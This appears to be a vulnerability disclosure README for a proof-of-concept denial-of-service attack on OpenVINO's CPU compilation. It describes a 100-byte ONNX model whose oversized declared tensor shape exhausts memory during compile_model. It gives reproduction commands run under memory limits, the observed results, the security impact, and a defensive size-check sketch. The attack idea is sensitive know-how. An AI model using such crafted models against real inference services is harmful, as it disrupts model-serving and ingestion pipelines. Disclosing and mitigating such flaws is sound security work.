OpenVINO CPU Compilation DoS PoC
Summary
This repository contains a proof-of-concept ONNX model that triggers excessive memory allocation during OpenVINO CPU compilation.
The PoC model is only 100 bytes, but it declares an oversized static tensor shape:
[1, 500000000] float32
OpenVINO accepts the model during core.read_model(), but core.compile_model(model, "CPU") consumes around 2GB RSS under a 3GB address-space limit and fails before compilation completes.
Affected Component
- Target: OpenVINO
- Tested version: 2026.2.1-21919-ede283a8e3-releases/2026/2
- Format: ONNX
- Trigger API: core.compile_model(model, "CPU")
- Device: CPU
Files
- poc_openvino_compile_dos.onnx: crafted ONNX PoC
- staged_openvino.py: reproduction script
- evidence_500m_runs.txt: three stable reproduction runs
- shape_compile_summary.txt: dimension sweep result
- evidence_poc_size.txt: PoC file size evidence
- oom_evidence_note.txt: note about previous OOM behavior
Reproduction
Install dependencies:
python3 -m venv .venv
source .venv/bin/activate
pip install openvino onnx numpy
Run with a safety memory limit:
/usr/bin/time -v prlimit --as=3221225472 --cpu=20 -- timeout --kill-after=2s 8s \
python -u staged_openvino.py poc_openvino_compile_dos.onnx
Expected Result
OpenVINO should reject the model before compilation or enforce safe resource checks before attempting large allocations.
Actual Result
core.read_model() succeeds, but core.compile_model(model, "CPU") consumes excessive memory and fails before compilation finishes.
Observed stable behavior:
[1] before read_model
[2] after read_model
[5] before compile_model
[-] EXCEPTION: RuntimeError Exception from src/inference/src/cpp/core.cpp:117
Maximum resident set size: around 2040 MB
Exit status: 2
Security Impact
An attacker can publish a very small crafted ONNX model. If a victim application automatically loads and compiles the model using the OpenVINO CPU backend, the process can consume excessive memory and fail, causing denial of service in model validation, model serving, or automated model ingestion pipelines.
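For ingestion pipelines, one mitigation is to check declared tensor sizes between core.read_model() and core.compile_model(). The sketch below is an added example, not code from this repository or from OpenVINO. The function names and both byte budgets are assumptions, and the sample rows are constructed from the shape given in the Summary.

```python
import math

MAX_TENSOR_BYTES = 256 * 1024**2  # assumed per-tensor budget (256 MiB)
MAX_TOTAL_BYTES = 1024**3         # assumed whole-graph budget (1 GiB)

def declared_tensors(model):
    """Yield (name, dims, itemsize) for every op output of an openvino.Model.
    dims is None when the shape is not fully static."""
    for op in model.get_ops():
        for out in op.outputs():
            ps = out.get_partial_shape()
            dims = list(ps.get_shape()) if ps.is_static else None
            yield op.get_friendly_name(), dims, out.get_element_type().size

def budget_violations(tensors, max_tensor=MAX_TENSOR_BYTES, max_total=MAX_TOTAL_BYTES):
    """Return reasons to refuse compilation; an empty list means within budget."""
    problems, total = [], 0
    for name, dims, itemsize in tensors:
        if dims is None:
            problems.append(f"{name}: dynamic shape, no static bound to check")
            continue
        nbytes = math.prod(dims) * itemsize  # declared size, a lower bound on real usage
        total += nbytes
        if nbytes > max_tensor:
            problems.append(f"{name}: {dims} needs {nbytes} bytes > {max_tensor}")
    if total > max_total:
        problems.append(f"graph total {total} bytes > {max_total}")
    return problems

def compile_guarded(core, path, device="CPU"):
    """Read the model, enforce the budget, and only then compile."""
    model = core.read_model(path)
    problems = budget_violations(declared_tensors(model))
    if problems:
        raise ValueError("refusing to compile: " + "; ".join(problems))
    return core.compile_model(model, device)

# Constructed sample: the [1, 500000000] float32 tensor from the Summary plus a small one.
SAMPLE = [("input", [1, 500_000_000], 4), ("small", [1, 1000], 4)]

if __name__ == "__main__":
    for line in budget_violations(SAMPLE):
        print(line)
```

The declared [1, 500000000] float32 tensor alone is 2,000,000,000 bytes, so it fails both assumed budgets. The prlimit wrapper from the Reproduction section is still worth keeping as a second layer, since this check only sees declared shapes.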